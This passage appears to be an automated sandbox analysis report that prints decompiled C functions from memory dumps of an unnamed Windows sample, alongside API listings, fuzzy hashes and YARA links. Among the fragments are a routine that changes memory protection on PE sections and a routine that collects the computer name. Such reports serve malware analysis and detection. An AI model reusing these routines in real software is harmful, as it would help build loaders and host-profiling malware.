						E00BB14EF();
						HeapFree( *0xbbd238, 0, _t40);
						goto L10;
					}
					_t24 = E00BB5E79(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E00BB9DB0(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}

0x00bb9958
0x00bb9958
0x00bb995b
0x00bb995c
0x00bb9966
0x00bb996d
0x00bb9972
0x00bb9974
0x00bb997a
0x00bb99a2
0x00bb99ba
0x00bb99bc
0x00bb99bd
0x00bb99bf
0x00bb99fd
0x00bb99fd
0x00bb9a03
0x00bb9a09
0x00bb9a09
0x00bb99c1
0x00bb99c7
0x00bb99ca
0x00bb99d9
0x00bb99db
0x00bb99e2
0x00bb9a16
0x00bb9a1b
0x00bb9a1d
0x00bb9a1f
0x00bb9a1f
0x00000000
0x00bb9a1d
0x00bb99e4
0x00bb99e9
0x00bb99f7
0x00000000
0x00bb99f7
0x00bb99b1
0x00bb99b6
0x00bb99b6
0x00000000
0x00bb99b6
0x00bb9984
0x00000000
0x00000000
0x00bb9993
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 00BB997C

Part of subcall function 00BB9DB0: GetTickCount.KERNEL32 ref: 00BB9DC4
Part of subcall function 00BB9DB0: wsprintfA.USER32 ref: 00BB9E14
Part of subcall function 00BB9DB0: wsprintfA.USER32 ref: 00BB9E31
Part of subcall function 00BB9DB0: wsprintfA.USER32 ref: 00BB9E5D
Part of subcall function 00BB9DB0: HeapFree.KERNEL32(00000000,?), ref: 00BB9E6F
Part of subcall function 00BB9DB0: wsprintfA.USER32 ref: 00BB9E90
Part of subcall function 00BB9DB0: HeapFree.KERNEL32(00000000,?), ref: 00BB9EA0
Part of subcall function 00BB9DB0: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00BB9ECE
Part of subcall function 00BB9DB0: GetTickCount.KERNEL32 ref: 00BB9EDF

RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 00BB999A
HeapFree.KERNEL32(00000000,00000002,00BB7859,?,00BB7859,00000002,?,?,00BB19AA,?), ref: 00BB99F7

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID:
API String ID: 1676223858-0
Opcode ID: 0a18038ef4eabe3eb6fd449ef9e271f4ccf81fdf06895eb1ad3b10605446710b
Instruction ID: eea74f3af94dc46df479cb09c6073d79546ff894dffc8aedd2c3274f5682c9c5
Opcode Fuzzy Hash: 0a18038ef4eabe3eb6fd449ef9e271f4ccf81fdf06895eb1ad3b10605446710b
Instruction Fuzzy Hash: 44216A75200204EFDB519F99DC80AEA77ECEF49350F1041AAFA0197250EBF4E940DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C10AD, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E0C10AD(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6e0c4140;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x6e0c10b7
0x6e0c10c4
0x6e0c10ca
0x6e0c10d6
0x6e0c10e6
0x6e0c10e8
0x6e0c10f0
0x6e0c1185
0x6e0c118c
0x00000000
0x00000000
0x00000000
0x6e0c10f6
0x6e0c10f6
0x6e0c10f6
0x6e0c10fa
0x00000000
0x00000000
0x6e0c1106
0x6e0c110a
0x6e0c112e
0x6e0c1132
0x6e0c1146
0x6e0c1146
0x6e0c114c
0x6e0c115b
0x6e0c115f
0x6e0c1167
0x6e0c1167
0x6e0c116f
0x6e0c1172
0x6e0c117f
0x00000000
0x00000000
0x00000000
0x00000000
0x6e0c117f
0x6e0c113a
0x6e0c113e
0x6e0c1144
0x00000000
0x00000000
0x00000000
0x6e0c1144
0x6e0c1112
0x6e0c1116
0x6e0c1120
0x6e0c1118
0x6e0c1118
0x6e0c1118
0x00000000
0x6e0c1116
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E0C10E6
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E0C115B
GetLastError.KERNEL32 ref: 6E0C1161

Memory Dump Source

Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 109fd72faadcf776941271c40f4c81480927745f013c5a0431e0f4048693c0a9
Instruction ID: 75a552f68f7f2b390ef0100c45fe7e69fab2262c0f5b68249eae3b736b8e0372
Opcode Fuzzy Hash: 109fd72faadcf776941271c40f4c81480927745f013c5a0431e0f4048693c0a9
Instruction Fuzzy Hash: 67214B3280020AEFDB14CF95C485AAEF7F5FB08B19F004859D40697585E3B8AA99CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BB1E40, Relevance: 3.9, APIs: 3, Instructions: 155
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00BB1E40(void* __eflags, int _a4) {
				intOrPtr _v12;
				WCHAR* _v16;
				char* _v20;
				int _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v88;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t80;
				WCHAR* _t85;

				_v88 = 0;
				memset( &_v84, 0, 0x2c);
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0xbbd2a4; // 0x2a5a5a8
				_t5 = _t40 + 0xbbee40; // 0x410025
				_t85 = E00BB771C(_t5);
				_v16 = _t85;
				if(_t85 == 0) {
					_t80 = 8;
					L24:
					return _t80;
				}
				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
				if(_t45 != 0) {
					_t80 = 1;
					L22:
					E00BB5DE8(_v16);
					goto L24;
				}
				if(E00BB4EC8(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t50 = E00BB8ECC(0,  *0xbbd33c);
				_v12 = _t50;
				if(_t50 == 0) {
					_t80 = 8;
					goto L19;
				} else {
					_t52 =  *0xbbd2a4; // 0x2a5a5a8
					_t11 = _t52 + 0xbbe81a; // 0x65696c43
					_t55 = E00BB8ECC(0, _t11);
					_t87 = _t55;
					if(_t55 == 0) {
						_t80 = 8;
					} else {
						_t80 = E00BB386E(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
						E00BB5DE8(_t87);
					}
					if(_t80 != 0) {
						L17:
						E00BB5DE8(_v12);
						L19:
						_t86 = _a4;
						if(_a4 != 0) {
							E00BB9D8B(_t86);
						}
						goto L22;
					} else {
						if(( *0xbbd260 & 0x00000001) == 0) {
							L14:
							E00BB10D9(_v84, _v88, _v88,  *0xbbd270, 0);
							_t80 = E00BB656F(_v88,  &_v80,  &_v76, 0);
							if(_t80 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t80 = E00BB9306( &_v40, 0);
							}
							E00BB5DE8(_v88);
							goto L17;
						}
						_t67 =  *0xbbd2a4; // 0x2a5a5a8
						_t18 = _t67 + 0xbbe823; // 0x65696c43
						_t70 = E00BB8ECC(0, _t18);
						_t89 = _t70;
						if(_t70 == 0) {
							_t80 = 8;
						} else {
							_t80 = E00BB386E(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
							E00BB5DE8(_t89);
						}
						if(_t80 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

0x00bb1e52
0x00bb1e55
0x00bb1e5c
0x00bb1e62
0x00bb1e63
0x00bb1e64
0x00bb1e65
0x00bb1e66
0x00bb1e67
0x00bb1e6f
0x00bb1e7b
0x00bb1e7d
0x00bb1e82
0x00bb1fd1
0x00bb1fd4
0x00bb1fd8
0x00bb1fd8
0x00bb1e94
0x00bb1e9c
0x00bb1fc4
0x00bb1fc5
0x00bb1fc8
0x00000000
0x00bb1fc8
0x00bb1eae
0x00bb1eb0
0x00bb1eb0
0x00bb1ebb
0x00bb1ec0
0x00bb1ec5
0x00bb1fb3
0x00000000
0x00bb1ecb
0x00bb1ecb
0x00bb1ed0
0x00bb1ed9
0x00bb1ede
0x00bb1ee7
0x00bb1f0a
0x00bb1ee9
0x00bb1eff
0x00bb1f01
0x00bb1f01
0x00bb1f0d
0x00bb1fa7
0x00bb1faa
0x00bb1fb4
0x00bb1fb4
0x00bb1fb9
0x00bb1fbb
0x00bb1fbb
0x00000000
0x00bb1f13
0x00bb1f1a
0x00bb1f5b
0x00bb1f6b
0x00bb1f81
0x00bb1f85
0x00bb1f8a
0x00bb1f90
0x00bb1f9d
0x00bb1f9d
0x00bb1fa2
0x00000000
0x00bb1fa2
0x00bb1f1c
0x00bb1f21
0x00bb1f2a
0x00bb1f2f
0x00bb1f33
0x00bb1f56
0x00bb1f35
0x00bb1f4b
0x00bb1f4d
0x00bb1f4d
0x00bb1f59
0x00000000
0x00000000
0x00000000
0x00000000
0x00bb1f59
0x00bb1f0d

APIs

memset.NTDLL ref: 00BB1E55

Part of subcall function 00BB771C: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00BB1E7B,00410025,00000005,?,00000000), ref: 00BB772D
Part of subcall function 00BB771C: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 00BB774A

lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00BB1E89
StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 00BB1E94

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: EnvironmentExpandStrings$lstrlenmemset
String ID:
API String ID: 3817122888-0
Opcode ID: 196c92e5ab9c481dcf0f3402f480472adcc8b36725bcd1fa788fe43972766636
Instruction ID: 38a98e7c2b94270bb82be1f77f5a72c1f1cc46e57aedbc43a96e2c4c1ef7c449
Opcode Fuzzy Hash: 196c92e5ab9c481dcf0f3402f480472adcc8b36725bcd1fa788fe43972766636
Instruction Fuzzy Hash: 42412A72A00219ABDB11ABE8CD85DFE7BEDEF04300B5049A6F905AB111E7F5DE45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9A9E, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00BB9A9E(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00BB546B(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xbbd2a4; // 0x2a5a5a8
						_t20 = _t68 + 0xbbe1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00BBA3D7(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x00bb9aa4
0x00bb9aa7
0x00bb9ab7
0x00bb9ac0
0x00bb9ac4
0x00bb9b92
0x00bb9b98
0x00bb9b98
0x00bb9ade
0x00bb9ae3
0x00bb9ae7
0x00bb9aed
0x00bb9af2
0x00bb9af9
0x00bb9b08
0x00bb9b08
0x00bb9b0c
0x00bb9b0e
0x00bb9b1a
0x00bb9b25
0x00bb9b30
0x00bb9b34
0x00bb9b3e
0x00bb9b42
0x00bb9b44
0x00bb9b49
0x00bb9b50
0x00bb9b60
0x00bb9b60
0x00bb9b49
0x00bb9b42
0x00bb9b62
0x00bb9b67
0x00bb9b6c
0x00bb9b6c
0x00bb9b6f
0x00bb9b78
0x00bb9b7d
0x00bb9b7d
0x00bb9b82
0x00bb9b87
0x00bb9b87
0x00bb9b82
0x00bb9b0c
0x00bb9b89
0x00bb9b8f
0x00000000

APIs

Part of subcall function 00BB546B: SysAllocString.OLEAUT32(80000002), ref: 00BB54C8
Part of subcall function 00BB546B: SysFreeString.OLEAUT32(00000000), ref: 00BB552E

SysFreeString.OLEAUT32(?), ref: 00BB9B7D
SysFreeString.OLEAUT32(00BB9595), ref: 00BB9B87

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 11962444abc5879c0710a31bfa65eb3830304e44ce5452db1789d3929b0cd7b2
Instruction ID: 2cf3e887236098aa7460da0925ee8bf18eaabf5cc60c0a6ed5260e563592be20
Opcode Fuzzy Hash: 11962444abc5879c0710a31bfa65eb3830304e44ce5452db1789d3929b0cd7b2
Instruction Fuzzy Hash: 49313971500119EFCB21DF98D888CEBBBB9FBC97507154698F9059B210D6B1ED51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C1718, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E0C1718() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x6e0c4144;
				if( *0x6e0c412c > 5) {
					_t16 = _t15 + 0x6e0c50f9;
				} else {
					_t16 = _t15 + 0x6e0c50b1;
				}
				E6E0C1FB4(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E6E0C118F( &_v32,  &_v16,  *0x6e0c4140 ^ 0xfd7cd1cf) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x6e0c4138);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E6E0C195D(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x6e0c4138 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E6E0C2034(_t44, _t32 + 4);
						}
					}
					_t25 = E6E0C1B56(_v28); // executed
				}
				ExitThread(_t25);
			}

0x6e0c171e
0x6e0c172f
0x6e0c1739
0x6e0c1731
0x6e0c1731
0x6e0c1731
0x6e0c1740
0x6e0c1749
0x6e0c174e
0x6e0c176c
0x6e0c17c8
0x6e0c176e
0x6e0c1774
0x6e0c177a
0x6e0c1788
0x6e0c178c
0x6e0c1793
0x6e0c179c
0x6e0c17a0
0x6e0c17a6
0x6e0c17b7
0x6e0c17a8
0x6e0c17ae
0x6e0c17ae
0x6e0c17a6
0x6e0c17bf
0x6e0c17bf
0x6e0c17ca

APIs

lstrlenW.KERNEL32(?), ref: 6E0C1774
ExitThread.KERNEL32 ref: 6E0C17CA

Memory Dump Source

Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: 024cda3f60b555dcc384fc7e74925beaa0534f303dbb58d8ecf9f93525b833e0
Instruction ID: bfcd913f7bf6f9f48c3303916b879256a67fc2c575525c931b920f2b130e0043
Opcode Fuzzy Hash: 024cda3f60b555dcc384fc7e74925beaa0534f303dbb58d8ecf9f93525b833e0
Instruction Fuzzy Hash: 97116D72508605AFDB11DBE5C848F8F77FCAB46B44F010A26F995D71A0E730E5898B93

Uniqueness

Uniqueness Score: -1.00%

Function 00BB1D9E, Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00BB23DB), ref: 00BB1DB7

Part of subcall function 00BB9A9E: SysFreeString.OLEAUT32(?), ref: 00BB9B7D

SysFreeString.OLEAUT32(00000000), ref: 00BB1DF8

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 3134845adc304e74c18be430450722d9e11d0ceb79e8ea96d8af5140e853a456
Instruction ID: 9fe7874dea27eaefe2faea59b6a14042aed225d8b68d32f630629a299d3fea08
Opcode Fuzzy Hash: 3134845adc304e74c18be430450722d9e11d0ceb79e8ea96d8af5140e853a456
Instruction Fuzzy Hash: 35014B3650010ABFCB01DFA8D9098EF7BB9EF48350B114162FA09E7120E7B0DA15CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BB5369, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00BB5369(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E00BB98E4(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E00BB5DE8(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x00bb536e
0x00bb5379
0x00bb537b
0x00bb5381
0x00bb5383
0x00bb5388
0x00bb5391
0x00bb5395
0x00bb539e
0x00bb53a2
0x00bb53b1
0x00bb53a4
0x00bb53a5
0x00bb53aa
0x00bb53aa
0x00bb53a2
0x00bb5395
0x00bb53ba

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,00BB5F06,74B5F710,00000000,?,?,00BB5F06), ref: 00BB5381

Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0

GetComputerNameExA.KERNELBASE(00000003,00000000,00BB5F06,00BB5F07,?,?,00BB5F06), ref: 00BB539E

Part of subcall function 00BB5DE8: HeapFree.KERNEL32(00000000,00000000,00BB682B,00000000,?,?,00000000), ref: 00BB5DF4

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: e60f30a7a9415279fd1b303bdeabb90b4341d1eaf5bb5efbea7e1b4327aea356
Instruction ID: bf0c05d723bb0eed58fbb1b8ab8ab65ecbeda289188620af16713890a5c28b0c
Opcode Fuzzy Hash: e60f30a7a9415279fd1b303bdeabb90b4341d1eaf5bb5efbea7e1b4327aea356
Instruction Fuzzy Hash: 67F05E26A00549BBEB21D6AA8D01FFF77EDDBC5790F2100A9AA05D3241EAF0DE019671

Uniqueness

Uniqueness Score: -1.00%

Function 00BB5BF1, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xbbd23c) == 0) {
						E00BB149B();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xbbd23c) == 1) {
						_t10 = E00BBA1E3(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x00bb5bf8
0x00bb5bf9
0x00bb5bfc
0x00bb5c2e
0x00bb5c30
0x00bb5c30
0x00bb5bfe
0x00bb5bff
0x00bb5c14
0x00bb5c1b
0x00bb5c1d
0x00bb5c1d
0x00bb5c1b
0x00bb5bff
0x00bb5c38

APIs

InterlockedIncrement.KERNEL32(00BBD23C), ref: 00BB5C06

Part of subcall function 00BBA1E3: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00BB5C19,?), ref: 00BBA1F6

InterlockedDecrement.KERNEL32(00BBD23C), ref: 00BB5C26

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: f6698688fb83f680aa06a5d57b70b2be2c98220053038beaa1c5dcdb96a83a1d
Instruction ID: d1bb2a6f1e7e86b7cf0e48ced78eedb56e27491c6a541947e358793a214d998f
Opcode Fuzzy Hash: f6698688fb83f680aa06a5d57b70b2be2c98220053038beaa1c5dcdb96a83a1d
Instruction Fuzzy Hash: EEE04F31208B2E9B87316FA8DD49BFAAFD2DB21790F414994F482D1060E6E4CC409693

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9CC9, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00BB9CC9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xbbd2a4; // 0x2a5a5a8
				_t4 = _t15 + 0xbbe39c; // 0x3618944
				_t20 = _t4;
				_t6 = _t15 + 0xbbe124; // 0x650047
				_t17 = E00BB9A9E(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E00BB9079(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x00bb9cd3
0x00bb9cda
0x00bb9cdb
0x00bb9cdc
0x00bb9cdd
0x00bb9ce3
0x00bb9ce8
0x00bb9ce8
0x00bb9cf2
0x00bb9d04
0x00bb9d0b
0x00bb9d39
0x00bb9d0d
0x00bb9d0f
0x00bb9d14
0x00bb9d36
0x00bb9d16
0x00bb9d19
0x00bb9d20
0x00bb9d25
0x00bb9d27
0x00bb9d27
0x00bb9d2c
0x00bb9d2c
0x00bb9d14
0x00bb9d40

APIs

Part of subcall function 00BB9A9E: SysFreeString.OLEAUT32(?), ref: 00BB9B7D

Part of subcall function 00BB9079: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00BB8E57,004F0053,00000000,?), ref: 00BB9082
Part of subcall function 00BB9079: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00BB8E57,004F0053,00000000,?), ref: 00BB90AC
Part of subcall function 00BB9079: memset.NTDLL ref: 00BB90C0

SysFreeString.OLEAUT32(00000000), ref: 00BB9D2C

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: bb6420d0275edb3c8d6628f144f9ef121b7ae43337e8677f53fc6b5693600e6e
Instruction ID: f0f15f3a6628242373ed3ff54dfde436d038c5d52d58c0e0912b5b384d28ef2d
Opcode Fuzzy Hash: bb6420d0275edb3c8d6628f144f9ef121b7ae43337e8677f53fc6b5693600e6e
Instruction Fuzzy Hash: 7D01783650411ABFDB12AFA9CC40AFABBF8FB08350F0105A5EA05E7061E7B0E912C790

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C1FB4, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON
